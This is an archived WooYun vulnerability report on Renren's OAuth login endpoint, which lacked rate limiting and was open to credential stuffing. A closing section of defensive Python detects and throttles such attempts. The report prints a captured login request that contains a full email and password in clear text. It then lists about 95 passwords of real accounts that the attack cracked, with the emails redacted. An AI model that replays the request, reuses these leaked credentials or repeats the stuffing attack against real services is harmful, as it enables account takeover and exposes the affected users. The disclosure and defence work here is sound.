WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
2015-05-08: Details sent to the vendor, awaiting vendor processing
2015-05-08: Vendor confirmed; details disclosed to the vendor only
2015-05-18: Details disclosed to core white hats and experts in the relevant field
2015-05-28: Details disclosed to ordinary white hats
2015-06-07: Details disclosed to intern white hats
2015-06-22: Details disclosed to the public
Credential stuffing (撞库扫号) is already one of the Top 10 Security Risks for 2014. Credential stuffing exposes users' private data.

The third-party (OAuth) login interface has no defense against credential stuffing: calls to the login interface are not rate-limited. Testing showed that replaying a certain leaked credential database against it yields a large number of valid login accounts. The captured login request to https://graph.renren.com/oauth/grant is as follows:
POST /oauth/grant HTTP/1.1
Host: graph.renren.com
Connection: close
Content-Length: 811
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://graph.renren.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://graph.renren.com/oauth/grant?client_id=6f74c7e44b824432835e70f0544013fb&redirect_uri=http%3A%2F%2Fpassport.baidu.com%2Fphoenix%2Faccount%2Fafterauth%3Fmkey%3D5fec5f70f3097022b2d86c338568de29&response_type=code&display=page&scope=publish_share+create_album+photo_upload+publish_blog+publish_checkin+publish_comment+publish_feed+read_user_album+read_user_blog+read_user_checkin+read_user_comment+read_user_feed+read_user_guestbook+read_user_invitation+read_user_like_history+read_user_message+read_user_notification+read_user_photo+read_user_status+send_invitation+send_message+status_update+write_guestbook&state=&secure=true&origin=00000&username=ddddd&error_code=4
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: anonymid=i9ea6gwi-brfc4d; depovince=GW; _r01_=1; __utma=151146938.1916745302.1431010087.1431010087.1431010087.1; __utmc=151146938; __utmz=151146938.1431010087.1.1.utmcsr=renren.com|utmccn=(referral)|utmcmd=referral|utmcct=/SysHome.do; jebe_key=e35dab7c-5844-44a6-82b9-e656fbb5b82f%7C0083196e9ea7095a9b38cfdeb7d12861%7C1431010451205%7C1%7C1431010452089; first_login_flag=1; loginfrom=syshome; [email protected]; ln_hurl=http://hdn.xnimg.cn/photos/hdn521/20101109/2035/h_main_CXTM_2765000203bd2f75.jpg; jebecookies=40809c3b-2866-4ffb-a1b6-d70d40ea1ee4|||||; ick_login=77c42c1e-88cf-42de-ba77-326369bd0865; ick=9601b7e3-6d26-4d07-97d9-9280d9945d4b
RA-Ver: 2.10.0
RA-Sid: 7B9DD012-20150303-080129-82895f-fb68a9
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3

login_type=false&username=huanlingyun_1984@163%2ecom&password=19840801&icode=&isNeedIcode=&authFeed=true&follow=true&porigin=80100&redirect_uri=http%3A%2F%2Fpassport.baidu.com%2Fphoenix%2Faccount%2Fafterauth%3Fmkey%3D5fec5f70f3097022b2d86c338568de29&client_id=6f74c7e44b824432835e70f0544013fb&response_type=code&scope=publish_share+create_album+photo_upload+publish_blog+publish_checkin+publish_comment+publish_feed+read_user_album+read_user_blog+read_user_checkin+read_user_comment+read_user_feed+read_user_guestbook+read_user_invitation+read_user_like_history+read_user_message+read_user_notification+read_user_photo+read_user_status+send_invitation+send_message+status_update+write_guestbook&state=&display=page&post_form_id=98ac067daf88e93c580b747c6b3e9123-30-1431053111294&authorizeOrigin=00000&secure=true
Testing showed that replaying a certain leaked credential database yields a large number of valid login accounts. Because I had not kept a record the first time, I ran it again; by then most accounts had already triggered the lockout policy. Of 15,000 credentials tried, 700-odd succeeded, which shows Renren still has a great many registered members.
Sample of valid hits (one "email password" pair per line; the email addresses were redacted to "[email protected]" by the archive mirror):

[email protected] xq19900809
[email protected] Yang5845211314
[email protected] 124052338
[email protected] 1301248118
[email protected] qushuliang0426
[email protected] 11091109
[email protected] woaimama
[email protected] zhanggeorge
[email protected] ag127val
[email protected] zzzhui123
[email protected] smilernihao
[email protected] zyqnihao1314521
[email protected] becky362329
[email protected] 5211314319
[email protected] wuyi8702
[email protected] qq123456
[email protected] yfj827319
[email protected] 11111111
[email protected] qiaolin911
[email protected] wangshuo
[email protected] caidianying
[email protected] maomao41421
[email protected] zhongai13
[email protected] 59305611
[email protected] 124592203
[email protected] 85481076
[email protected] s@iDream
[email protected] up369com
[email protected] qpl1qpl1
[email protected] 258468895
[email protected] 13580617139
[email protected] huang55431
[email protected] 813813813
[email protected] 83030545
[email protected] 11709352
[email protected] 27821195
[email protected] 85918725lovejin
[email protected] 19860623
[email protected] 19770722
[email protected] zhz13934157016
[email protected] 13469847409
[email protected] 19820920
[email protected] 19871208
[email protected] sandy1234
[email protected] yangjia1234
[email protected] 19820809
[email protected] 87831411
[email protected] 072324aa
[email protected] 6633270692
[email protected] 19850416
[email protected] 87334967
[email protected] shengri19880515
[email protected] cyxcxycyx4321
[email protected] cheng911
[email protected] qiang477577
[email protected] 526201344
[email protected] luocan16816888
[email protected] 198552200
[email protected] wei195411
[email protected] 0126530334yxx
[email protected] LWZL139791
[email protected] sy2180836
[email protected] 2199kaixinxiaoyu
[email protected] 24248423
[email protected] n19880308n
[email protected] zygy564335
[email protected] 198610102418
[email protected] 159357qtoetu
[email protected] kamendeqing1984
[email protected] 58929176
[email protected] 15849064661qzm
[email protected] lubingquan
[email protected] 19086763
[email protected] 153998056ding
[email protected] a34416912
[email protected] 79981134
[email protected] qq63426084
[email protected] wanqin210
[email protected] hejiafeng98
[email protected] snaketop
[email protected] ba0630ham
[email protected] 13972688068
[email protected] liujia19891127
[email protected] zxcvb123
[email protected] abiange2009
[email protected] qiujin5201314
[email protected] jia368495
[email protected] liuzhe123
[email protected] zhuchiju
[email protected] 19870623zyl
[email protected] 27930333
[email protected] lw198718
[email protected] 13887295120lya
Reference on defending against credential stuffing: http://stayliv3.github.io/2015/04/15/%E6%92%9E%E5%BA%93%E6%94%BB%E5%87%BB%E9%98%B2%E5%BE%A1%E6%96%B9%E6%A1%88/
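The report's numbers illustrate why a per-account lockout on its own does not stop this attack: a stuffing run tries each leaked account only once, so lockout mostly bites on the second pass (as the author observed), and an attacker can use it to lock legitimate users out. The signal a defender can act on is one source address cycling through many distinct usernames with a high failure ratio, combined with a per-source attempt budget. The following is an added example written for this page, not code from the report or from Renren; the log layout ("time ip username result"), the sample lines and all thresholds are assumptions.

```python
"""Credential-stuffing detection and throttling for a login endpoint.

Added example, not Renren's code. Log lines are constructed and the
"time ip username result" layout is an assumption.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log for POST /oauth/grant (layout is an assumption).
SAMPLE_LOG = "\n".join(
    # one source address cycling through many distinct accounts, nearly all failing
    [f"2015-05-08T13:00:{i:02d} 203.0.113.7 user{i:03d}@example.com fail"
     for i in range(11)]
    + ["2015-05-08T13:00:11 203.0.113.7 user011@example.com success"]
    # a normal user mistyping a password twice, then succeeding
    + ["2015-05-08T13:02:00 198.51.100.9 alice@example.com fail",
       "2015-05-08T13:02:20 198.51.100.9 alice@example.com fail",
       "2015-05-08T13:02:45 198.51.100.9 alice@example.com success"]
)


def parse_log(text):
    """Parse lines into (timestamp, ip, username, succeeded) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, ip, user, result = line.split()
        events.append((datetime.fromisoformat(ts), ip, user, result == "success"))
    return events


def detect_stuffing(events, window=timedelta(minutes=5),
                    min_distinct=10, min_fail_ratio=0.8):
    """Return {ip: (distinct_users, failures, attempts)} for every source whose
    attempts in some sliding `window` touch at least `min_distinct` accounts
    with a failure ratio of at least `min_fail_ratio` (thresholds assumed)."""
    by_ip = defaultdict(list)
    for ts, ip, user, ok in sorted(events):
        by_ip[ip].append((ts, user, ok))
    flagged = {}
    for ip, evs in by_ip.items():
        recent = deque()
        for ts, user, ok in evs:
            recent.append((ts, user, ok))
            while ts - recent[0][0] > window:       # drop events outside the window
                recent.popleft()
            attempts = len(recent)
            failures = sum(1 for _, _, o in recent if not o)
            distinct = len({u for _, u, _ in recent})
            if distinct >= min_distinct and failures / attempts >= min_fail_ratio:
                flagged[ip] = (distinct, failures, attempts)
    return flagged


class LoginThrottle:
    """Per-source attempt budget plus per-account lockout (thresholds assumed).

    The per-source budget is what actually limits a stuffing run; the account
    lockout only protects against repeated guesses at a single account."""

    def __init__(self, ip_limit=20, ip_window=timedelta(minutes=1),
                 lock_after=5, lock_for=timedelta(minutes=15)):
        self.ip_limit, self.ip_window = ip_limit, ip_window
        self.lock_after, self.lock_for = lock_after, lock_for
        self.ip_hits = defaultdict(deque)   # ip -> timestamps of recent attempts
        self.failures = defaultdict(int)    # account -> consecutive failures
        self.locked_until = {}              # account -> lock expiry time

    def check(self, ip, user, now):
        """Decide before verifying the password; returns (allowed, reason)."""
        hits = self.ip_hits[ip]
        while hits and now - hits[0] > self.ip_window:
            hits.popleft()
        if len(hits) >= self.ip_limit:
            return False, "ip_rate_limited"
        if user in self.locked_until and now < self.locked_until[user]:
            return False, "account_locked"
        return True, "ok"

    def record(self, ip, user, now, success):
        """Record the outcome of an attempt that was allowed through."""
        self.ip_hits[ip].append(now)
        if success:
            self.failures[user] = 0
            self.locked_until.pop(user, None)
            return
        self.failures[user] += 1
        if self.failures[user] >= self.lock_after:
            self.locked_until[user] = now + self.lock_for


if __name__ == "__main__":
    for ip, stats in detect_stuffing(parse_log(SAMPLE_LOG)).items():
        print(f"{ip}: {stats[0]} accounts, {stats[1]}/{stats[2]} failed")
```

Running the detector over the sample flags 203.0.113.7 (12 accounts, 11 of 12 attempts failed) and leaves 198.51.100.9 alone, since a user retrying one account never raises the distinct-username count. In production the per-source key should combine address with device or session signals, since stuffing traffic is commonly spread across many addresses, and the same failure-ratio logic can key on the redirect_uri or client_id of the OAuth flow to spot abuse of one integration.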
Severity: Medium
Vulnerability Rank: 6
Confirmed at: 2015-05-08 13:21
Vendor response: Thanks, many thanks!
Remarks: None yet